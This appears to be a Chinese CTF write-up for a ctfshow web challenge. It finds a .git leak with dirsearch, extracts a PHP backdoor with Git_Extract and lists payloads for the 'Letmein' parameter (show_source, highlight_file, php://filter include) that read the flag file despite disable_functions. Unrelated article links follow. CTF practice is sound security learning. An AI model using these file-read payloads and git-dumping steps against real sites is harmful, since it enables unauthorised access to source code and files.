ctfshow-web红包题第七弹

  • 开发
  • 38

打开题目首先看到的就是一个phpinfo(),找不到别的东西。

1、目录扫描

(不知道为什么我扫这一个就很慢,个/s,会疯)

dirsearch -u http://2f681fde-cc3c-455e-9a07-9161f6aca81b.challenge.ctf.show/ -e*

扫出来会发现很多.git,无疑就是存在git泄露 

2、Git_Extract

(这里使用GitHack不好使,所有选择Git_Extract)

 项目地址:Git_Extract

python2 git_extract.py https://ce1ab195-de72-4774-9abb-0ec653b27cb7.challenge.ctf.show/.git/

有后门文件。

由于disable_functions禁用了很多能执行系统命令的函数(system、passthru等),所有我们通过蚁剑连接上后门,只能看看目录结构,找到flag的位置,查看不了文件,打开命令行也不行

playload:

?Letmein=show_source("../flag.txt");
?Letmein=highlight_file("../flag.txt");

# 伪协议读取
?Letmein=include("php://filter/resource=../flag.txt");

 

转载请说明出处,谢谢

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-23 01:02:01       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-23 01:02:01       100 阅读

  9. 在Django里面运行非项目文件

    2024-04-23 01:02:01       82 阅读

  19. Python语言-面向对象

    2024-04-23 01:02:01       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-04-23 01:02:01       85 阅读

热门阅读

  7. 【程序设计与算法——C/C++入门】C语言入门

    2024-04-23 01:02:01       41 阅读

  10. 37-4 用Python编写SQL注入的基于错误报告的POC

    2024-04-23 01:02:01       37 阅读

  11. 12.Vue2.x收集表单数据input | v-model | select

    2024-04-23 01:02:01       36 阅读

  16. STM32 CAN发送邮箱和接收FIFO

    2024-04-23 01:02:01       26 阅读

  17. 若依学习记录

    2024-04-23 01:02:01       34 阅读

  18. 聚类算法的学习

    2024-04-23 01:02:01       26 阅读

  20. uniapp微信小程序蓝牙连接与设备数据对接

    2024-04-23 01:02:01       29 阅读

  24. 《1w实盘and大盘基金预测 day25》

    2024-04-23 01:02:01       35 阅读

  28. 笨蛋学C++【C++基础第三弹】

    2024-04-23 01:02:01       27 阅读

  29. element UI 走马灯 initial-index动态赋值 不生效问题

    2024-04-23 01:02:01       37 阅读

  30. 密钥派生算法介绍 及 PBKDF2(过时)<Bcrypt(开始淘汰)<Scrypt< Argon2(含Argon2d、Argon2i、Argon2id)简介 密钥派生算法介绍

    2024-04-23 01:02:01       30 阅读